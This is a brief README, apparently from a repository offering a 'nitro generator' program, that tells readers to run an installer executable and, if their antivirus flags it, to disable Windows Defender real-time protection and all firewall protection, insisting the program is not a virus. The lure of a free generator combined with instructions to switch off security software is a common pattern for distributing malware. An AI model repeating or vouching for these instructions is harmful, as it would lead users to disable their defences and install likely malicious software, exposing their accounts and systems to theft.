roshaabjeen/nitrogen/README.md

     Open “NitroGenerator-V2-Win64.exe”, then click Yes on the prompt.
 Go through the installer.
   If it asks, serial key is “XXXXX-XXXXX-XXXXX-XXXXX”.
     Once installed, the Program will auto-launch, and you will have a working nitro generator!

+If your antivirus flags the program, turn off real-time protection on Windows Defender, along with all protection on any other third-party firewalls.
+Our program is NOT a virus.